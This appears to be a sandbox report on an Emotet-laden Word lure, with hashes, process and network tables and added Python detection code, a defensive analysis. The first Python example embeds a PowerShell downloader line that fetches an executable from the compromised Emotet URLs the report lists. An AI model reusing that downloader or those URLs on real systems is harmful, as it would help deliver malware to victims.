File name: | 1614_202008 ご入金額の通知・ご請求書発行のお願い.doc |
Full analysis: | https://app.any.run/tasks/4353de91-c659-4d67-9a7d-b6e429088696 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into a very destructive piece of malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
Analysis date: | September 30, 2020, 08:57:27 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | — |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Molestiae., Author: Alicia Blanchard, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Aug 27 23:37:00 2020, Last Saved Time/Date: Thu Aug 27 23:37:00 2020, Number of Pages: 1, Number of Words: 5, Number of Characters: 29, Security: 0 |
MD5: | CA15F9F45971EA442943084547761994 |
SHA1: | F4134B9DF06C604BEF7619DB66500DF2684AE000 |
SHA256: | A02A8AD984B702BCF392E49FC099D28BB09A1FB57ACC50FE3F090678F3FEF082 |
SSDEEP: | 3072:C6Yy0u8YGgjv+ZvchmkHcI/o1/Vb6//////////////////////////////////Y:CC0uXnWFchmmcI/o1/+Qswayp |
Extension | Identified type | Score
---|---|---
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
Field | Value
---|---
Title: | Molestiae.
Subject: | - |
Author: | Alicia Blanchard |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2020:08:27 22:37:00 |
ModifyDate: | 2020:08:27 22:37:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 29 |
Security: | None |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 33 |
AppVersion: | 15 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | -
CodePage: | Unicode UTF-16, little endian |
LocaleIndicator: | 1033 |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2136 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\1614_202008 ご入金額の通知・ご請求書発行のお願い.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
2792 | powersheLL -e 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe | — | wmiprvse.exe
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
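The process table shows the launch chain that makes this document worth blocking on sight: WINWORD.EXE opens the file, and a case-mangled `powersheLL -e <base64>` appears with wmiprvse.exe as its parent rather than Word, because the macro creates the process through WMI (Win32_Process.Create), which breaks the Office-to-PowerShell lineage that most detection rules key on. The Python below is an added example written for this page (not ANY.RUN's tooling and not the malware's code) that scores process-creation events for exactly those traits and decodes a -EncodedCommand argument back to readable script text. The event records, the helper names and the script inside the base64 are constructed for the example; the report redacts the real encoded command, so the stand-in script only reuses URLs that appear in the HTTP request table of this report.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
CANONICAL_PS = ("powershell", "powershell.exe")
URL_RE = re.compile(r"https?://[^\s'\",;)]+")
# The abbreviated switch forms PowerShell itself accepts (-e, -ec, -enc, -EncodedCommand).
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


@dataclass
class ProcEvent:
    pid: int
    parent_image: str
    image: str
    cmdline: str


@dataclass
class Finding:
    pid: int
    indicators: List[str] = field(default_factory=list)
    decoded_script: Optional[str] = None
    urls: List[str] = field(default_factory=list)


def encode_powershell_e(script: str) -> str:
    # -EncodedCommand expects base64 over the UTF-16LE bytes of the script.
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid base64 / not UTF-16LE: treat as "no encoded command"


def _basename(path: str) -> str:
    return re.split(r"[\\/]", path.strip('"'))[-1]


def analyze(ev: ProcEvent) -> Finding:
    f = Finding(pid=ev.pid)
    if _basename(ev.image).lower() != "powershell.exe":
        return f  # only PowerShell launches are scored here
    parent = _basename(ev.parent_image).lower()
    if parent in OFFICE_IMAGES:
        f.indicators.append(f"PowerShell is a direct child of {parent}")
    elif parent == "wmiprvse.exe":
        f.indicators.append("PowerShell spawned by the WMI provider host "
                            "(Win32_Process.Create hides the Office parent)")
    tokens = ev.cmdline.split()
    first = _basename(tokens[0]) if tokens else ""
    # "powersheLL" resolves to the same binary but evades naive case-sensitive string matches.
    if first.lower() in CANONICAL_PS and first not in CANONICAL_PS:
        f.indicators.append(f"case-mangled image name on command line: {first}")
    decoded = decode_encoded_command(ev.cmdline)
    if decoded is not None:
        f.indicators.append("-EncodedCommand payload present")
        f.decoded_script = decoded
        f.urls = URL_RE.findall(decoded)
    return f


# Constructed sample: lineage, paths and the "powersheLL -e" spelling mirror the process
# table above; the script inside the base64 is a stand-in written for this example (the
# report redacts the real one) and only reuses URLs from the HTTP request table.
SAMPLE_SCRIPT = (
    "$u='http://www.uniquewv.com/cgi-bin/OVJ9qY/,http://theeldestgeek.com/error/FS/,"
    "http://rickthewelder.com/dtbkup20110205/i/'.Split(',');"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$env:TEMP+'\\a.exe');break}catch{}}"
)
SAMPLE_EVENTS = [
    ProcEvent(2136, r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\1614_202008 ご入金額の通知・ご請求書発行のお願い.doc"'),
    ProcEvent(2792, r"C:\Windows\System32\wbem\wmiprvse.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe",
              "powersheLL -e " + encode_powershell_e(SAMPLE_SCRIPT)),
]


def run(events: List[ProcEvent] = SAMPLE_EVENTS) -> List[Finding]:
    return [f for f in map(analyze, events) if f.indicators]


if __name__ == "__main__":
    for hit in run():
        print(hit.pid, hit.indicators, hit.urls)
```

Matching on the parent alone would miss this sample, since the direct parent is wmiprvse.exe and not WINWORD.EXE; correlating the WMI parent with an encoded command and the odd casing is what separates it from legitimate administrative PowerShell. The decoded URL list is also the fastest way to get blockable indicators out of the document without executing it.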
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRB1B2.tmp.cvr | — | — | —
2136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~DFAC2EE0919521F179.TMP | — | — | —
2792 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4SU1I85OZ7B1TC4ATZTC.temp | — | — | —
2792 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 907C5FD303717561FE1B4EA4297DAC9A | 219788D162769A2E9475AF5337CA17B4D213A15ADE3E7F46F3FC02ADD48CD09D
2792 | powersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19c029.TMP | binary | 907C5FD303717561FE1B4EA4297DAC9A | 219788D162769A2E9475AF5337CA17B4D213A15ADE3E7F46F3FC02ADD48CD09D
2136 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 873065E64309224CB282A4A8A1ACBB91 | 37B9F0795B54CF0C8656DA0AF3F83083C626E94579EFF4C52675A5117589EBFC
2136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 0DC85AA6CC7E2116604F4A5A3D961BE7 | 43BD818F79B3D655D35F82EAD36488683794C8AB1462CA3E585BB2277EA2CFE8
2136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$14_202008 ご入金額の通知・ご請求書発行のお願い.doc | pgc | E980C29A8BA05C5F6846C904B70FEC3F | 9ED725BEB2D9C525CB6B0F014F44AB401EF92A22DC0589E9D9F774D666268FF3
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2792 | powersheLL.exe | GET | — | 158.106.138.177:80 | http://www.uniquewv.com/cgi-bin/OVJ9qY/ | US | — | — | unknown |
2792 | powersheLL.exe | GET | 301 | 158.106.138.177:80 | http://uniquewv.com/cgi-bin/OVJ9qY/ | US | — | — | unknown |
2792 | powersheLL.exe | GET | 403 | 74.96.241.34:80 | http://theeldestgeek.com/error/FS/ | US | html | 741 b | suspicious |
2792 | powersheLL.exe | GET | 404 | 108.60.15.59:80 | http://rickthewelder.com/dtbkup20110205/i/ | CA | html | 124 b | suspicious |
2792 | powersheLL.exe | GET | 404 | 162.241.88.184:80 | http://tfbauru.com.br/cgi-bin/Lhe/ | US | html | 315 b | suspicious |
2792 | powersheLL.exe | GET | 301 | 185.221.108.96:80 | http://tuls.pl/cgi-bin/7a9/ | unknown | html | 234 b | unknown |
2792 | powersheLL.exe | GET | 404 | 185.221.108.96:80 | http://tuls.pl/cgi-bin/7a9 | unknown | html | 1.52 Kb | unknown |
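The HTTP table shows the second behavioural trait of this sample: a single PowerShell process walks a list of compromised sites one after another (no response, 301, 403, 404, 404, 301, 404) because the downloader only stops at the first URL that actually serves the payload; here none did, so nothing was dropped. The Python below is an added example, not part of the ANY.RUN report, that parses proxy-style log lines and flags a process contacting several unrelated domains inside a short window with at most one of them answering 2xx. The log format and the timestamps are invented for the example, while process, method, status, peer and URL are copied from the rows above; the chrome.exe line is a constructed control, and `registrable()` is a deliberate simplification that only strips a `www.` prefix.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, NamedTuple, Optional
from urllib.parse import urlparse

# Constructed line shape: "<iso timestamp> pid=<n> proc=<image> <method> <status|-> <ip:port> <url>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) pid=(?P<pid>\d+) proc=(?P<proc>\S+) (?P<method>\S+) "
    r"(?P<status>\S+) (?P<peer>\S+) (?P<url>\S+)$"
)


class Request(NamedTuple):
    ts: datetime
    pid: int
    proc: str
    method: str
    status: Optional[int]  # None when the server never answered ("-" in the log)
    host: str
    url: str


def parse_log(text: str) -> List[Request]:
    reqs: List[Request] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip lines that are not in the expected shape
        status = None if m["status"] == "-" else int(m["status"])
        host = urlparse(m["url"]).hostname or ""
        reqs.append(Request(datetime.fromisoformat(m["ts"]), int(m["pid"]), m["proc"],
                            m["method"], status, host, m["url"]))
    return reqs


def registrable(host: str) -> str:
    # Simplification for this example: fold www.example.com into example.com.
    # Real code should use the Public Suffix List rather than a prefix strip.
    return host[4:] if host.startswith("www.") else host


def find_download_chains(reqs: List[Request], min_domains: int = 3,
                         window_s: int = 120) -> Dict[int, dict]:
    """Flag a process that tries several distinct domains in quick succession with at most
    one of them answering 2xx: the fallback behaviour of a downloader walking a URL list."""
    by_pid: Dict[int, List[Request]] = defaultdict(list)
    for r in reqs:
        by_pid[r.pid].append(r)
    hits: Dict[int, dict] = {}
    for pid, rs in by_pid.items():
        rs.sort(key=lambda r: r.ts)
        span = (rs[-1].ts - rs[0].ts).total_seconds()
        domains: List[str] = []
        for r in rs:
            d = registrable(r.host)
            if d not in domains:
                domains.append(d)  # keep first-seen order: it is the attacker's URL list order
        served = {registrable(r.host) for r in rs
                  if r.status is not None and 200 <= r.status < 300}
        if len(domains) >= min_domains and span <= window_s and len(served) <= 1:
            hits[pid] = {"proc": rs[0].proc, "domains": domains, "span_s": span,
                         "served_by": next(iter(served), None)}
    return hits


# Constructed log lines: process, method, status, peer and URL come from the HTTP request
# table above; the timestamps and the final chrome.exe control line are invented.
SAMPLE_LOG = """\
2020-09-30T08:57:41 pid=2792 proc=powersheLL.exe GET - 158.106.138.177:80 http://www.uniquewv.com/cgi-bin/OVJ9qY/
2020-09-30T08:57:42 pid=2792 proc=powersheLL.exe GET 301 158.106.138.177:80 http://uniquewv.com/cgi-bin/OVJ9qY/
2020-09-30T08:57:44 pid=2792 proc=powersheLL.exe GET 403 74.96.241.34:80 http://theeldestgeek.com/error/FS/
2020-09-30T08:57:45 pid=2792 proc=powersheLL.exe GET 404 108.60.15.59:80 http://rickthewelder.com/dtbkup20110205/i/
2020-09-30T08:57:47 pid=2792 proc=powersheLL.exe GET 404 162.241.88.184:80 http://tfbauru.com.br/cgi-bin/Lhe/
2020-09-30T08:57:48 pid=2792 proc=powersheLL.exe GET 301 185.221.108.96:80 http://tuls.pl/cgi-bin/7a9/
2020-09-30T08:57:49 pid=2792 proc=powersheLL.exe GET 404 185.221.108.96:80 http://tuls.pl/cgi-bin/7a9
2020-09-30T08:58:10 pid=1204 proc=chrome.exe GET 200 93.184.216.34:443 https://example.com/
"""


def run(log: str = SAMPLE_LOG) -> Dict[int, dict]:
    return find_download_chains(parse_log(log))


if __name__ == "__main__":
    for pid, hit in run().items():
        print(pid, hit["proc"], hit["domains"], "served_by:", hit["served_by"])
```

The `served_by` field matters for triage: when the chain ends with a 2xx, that domain is the one that actually delivered the payload and the dropped file should be hunted for on the host; when it is None, as in this run, the download failed and the infection most likely stalled at the loader stage.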
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2792 | powersheLL.exe | 108.60.15.59:80 | rickthewelder.com | In2net Network Inc. | CA | suspicious |
2792 | powersheLL.exe | 174.136.37.108:80 | sitecgps.com | Colo4, LLC | US | unknown |
2792 | powersheLL.exe | 185.221.108.96:80 | tuls.pl | — | — | unknown |
2792 | powersheLL.exe | 162.241.88.184:80 | tfbauru.com.br | CyrusOne LLC | US | suspicious |
2792 | powersheLL.exe | 74.96.241.34:80 | theeldestgeek.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | suspicious |
2792 | powersheLL.exe | 64.90.34.152:443 | paulburkphotography.com | New Dream Network, LLC | US | unknown |
2792 | powersheLL.exe | 158.106.138.177:80 | uniquewv.com | — | US | unknown |
Domain | IP | Reputation
---|---|---
rickthewelder.com | 108.60.15.59 | suspicious
sitecgps.com | 174.136.37.108 | suspicious
tfbauru.com.br | 162.241.88.184 | suspicious
paulburkphotography.com | 64.90.34.152 | unknown
theeldestgeek.com | 74.96.241.34 | suspicious
uniquewv.com | 158.106.138.177 | unknown
www.uniquewv.com | 158.106.138.177 | unknown
tuls.pl | 185.221.108.96 | unknown
dns.msftncsi.com | — | shared